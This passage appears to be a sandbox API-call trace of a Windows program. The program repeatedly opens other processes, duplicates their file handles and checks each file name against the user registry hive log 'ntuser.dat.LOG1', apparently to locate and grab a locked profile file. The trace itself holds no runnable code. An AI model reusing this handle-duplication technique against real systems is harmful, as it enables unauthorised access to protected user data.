0x1e8 [0161.485] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x984, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.485] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.485] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.486] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.486] CloseHandle (hObject=0x1e4) returned 1 [0161.486] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.486] CloseHandle (hObject=0x194) returned 1 [0161.486] CloseHandle (hObject=0x1e8) returned 1 [0161.486] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.486] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x9f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.487] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.487] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.488] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.488] CloseHandle (hObject=0x1e4) returned 1 [0161.488] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.488] CloseHandle (hObject=0x194) returned 1 [0161.488] CloseHandle (hObject=0x1e8) returned 1 [0161.488] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.489] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.489] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.489] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.490] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.490] CloseHandle (hObject=0x1e4) returned 1 [0161.490] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.490] CloseHandle (hObject=0x194) returned 1 [0161.490] CloseHandle (hObject=0x1e8) returned 1 [0161.490] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.490] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa34, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.494] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.497] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.497] CloseHandle (hObject=0x1e4) returned 1 [0161.497] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.497] CloseHandle (hObject=0x194) returned 1 [0161.497] CloseHandle (hObject=0x1e8) returned 1 [0161.497] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.497] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.497] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.498] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.499] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.499] CloseHandle (hObject=0x1e4) returned 1 [0161.499] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.499] CloseHandle (hObject=0x194) returned 1 [0161.499] CloseHandle (hObject=0x1e8) returned 1 [0161.499] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.499] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.500] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.501] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.501] CloseHandle (hObject=0x1e4) returned 1 [0161.501] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.501] CloseHandle (hObject=0x194) returned 1 [0161.501] CloseHandle (hObject=0x1e8) returned 1 [0161.502] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.502] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xae4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.502] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.502] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.503] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.503] CloseHandle (hObject=0x1e4) returned 1 [0161.503] _wcsicmp (_Str1="\\FXSAPIDebugLogFile.txt", _Str2="\\ntuser.dat.LOG1") returned -8 [0161.503] CloseHandle (hObject=0x194) returned 1 [0161.503] CloseHandle (hObject=0x1e8) returned 1 [0161.503] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.503] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xaf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.504] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.505] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.505] CloseHandle (hObject=0x1e4) returned 1 [0161.505] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.505] CloseHandle (hObject=0x194) returned 1 [0161.505] CloseHandle (hObject=0x1e8) returned 1 [0161.505] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.505] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x121c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.506] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.507] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.507] CloseHandle (hObject=0x1e4) returned 1 [0161.507] _wcsicmp (_Str1="\\ActionCenter.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.507] CloseHandle (hObject=0x194) returned 1 [0161.507] CloseHandle (hObject=0x1e8) returned 1 [0161.507] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.507] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.507] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.509] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.512] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.513] CloseHandle (hObject=0x1e4) returned 1 [0161.513] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0161.513] CloseHandle (hObject=0x194) returned 1 [0161.513] CloseHandle (hObject=0x1e8) returned 1 [0161.513] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.513] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1234, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.513] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.514] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.514] CloseHandle (hObject=0x1e4) returned 1 [0161.514] CloseHandle (hObject=0x194) returned 1 [0161.514] CloseHandle (hObject=0x1e8) returned 1 [0161.514] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.514] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.514] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.515] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.519] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.519] CloseHandle (hObject=0x1e4) returned 1 [0161.519] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.519] CloseHandle (hObject=0x194) returned 1 [0161.520] CloseHandle (hObject=0x1e8) returned 1 [0161.520] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.520] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.521] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.521] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.521] CloseHandle (hObject=0x1e4) returned 1 [0161.521] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.522] CloseHandle (hObject=0x194) returned 1 [0161.522] CloseHandle (hObject=0x1e8) returned 1 [0161.522] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.522] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.522] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.522] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.523] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.523] CloseHandle (hObject=0x1e4) returned 1 [0161.523] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.523] CloseHandle (hObject=0x194) returned 1 [0161.523] CloseHandle (hObject=0x1e8) returned 1 [0161.523] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.524] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.524] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.525] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.525] CloseHandle (hObject=0x1e4) returned 1 [0161.525] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.525] CloseHandle (hObject=0x194) returned 1 [0161.525] CloseHandle (hObject=0x1e8) returned 1 [0161.525] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.525] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.526] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.527] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.527] CloseHandle (hObject=0x1e4) returned 1 [0161.527] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.527] CloseHandle (hObject=0x194) returned 1 [0161.527] CloseHandle (hObject=0x1e8) returned 1 [0161.527] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.527] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.527] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.528] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.529] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.529] CloseHandle (hObject=0x1e4) returned 1 [0161.529] _wcsicmp (_Str1="\\thumbcache_idx.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0161.529] CloseHandle (hObject=0x194) returned 1 [0161.529] CloseHandle (hObject=0x1e8) returned 1 [0161.529] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.529] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x137c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.530] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.531] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.531] CloseHandle (hObject=0x1e4) returned 1 [0161.531] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.531] CloseHandle (hObject=0x194) returned 1 [0161.531] CloseHandle (hObject=0x1e8) returned 1 [0161.531] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.531] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1388, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.532] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.533] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.533] CloseHandle (hObject=0x1e4) returned 1 [0161.533] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.533] CloseHandle (hObject=0x194) returned 1 [0161.533] CloseHandle (hObject=0x1e8) returned 1 [0161.533] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.533] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.533] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.534] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.535] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.535] CloseHandle (hObject=0x1e4) returned 1 [0161.535] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.535] CloseHandle (hObject=0x194) returned 1 [0161.535] CloseHandle (hObject=0x1e8) returned 1 [0161.535] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0161.535] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x13a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.536] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.537] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.537] CloseHandle (hObject=0x1e4) returned 1 [0161.537] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.537] CloseHandle (hObject=0x194) returned 1 [0161.537] CloseHandle (hObject=0x1e8) returned 1 [0161.537] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0161.537] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.538] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.539] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.539] CloseHandle (hObject=0x1e4) returned 1 [0161.539] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.539] CloseHandle (hObject=0x194) returned 1 [0161.539] CloseHandle (hObject=0x1e8) returned 1 [0161.539] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0161.539] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.540] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.540] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.541] CloseHandle (hObject=0x1e4) returned 1 [0161.541] CloseHandle (hObject=0x194) returned 1 [0161.541] CloseHandle (hObject=0x1e8) returned 1 [0161.541] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0161.541] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.541] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.542] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.542] CloseHandle (hObject=0x1e4) returned 1 [0161.542] CloseHandle (hObject=0x194) returned 1 [0161.542] CloseHandle (hObject=0x1e8) returned 1 [0161.542] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0161.542] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.543] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.544] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.544] CloseHandle (hObject=0x1e4) returned 1 [0161.544] CloseHandle (hObject=0x194) returned 1 [0161.544] CloseHandle (hObject=0x1e8) returned 1 [0161.544] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0161.544] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.545] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.545] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.545] CloseHandle (hObject=0x1e4) returned 1 [0161.546] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0161.546] CloseHandle (hObject=0x194) returned 1 [0161.546] CloseHandle (hObject=0x1e8) returned 1 [0161.546] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0161.546] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.546] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 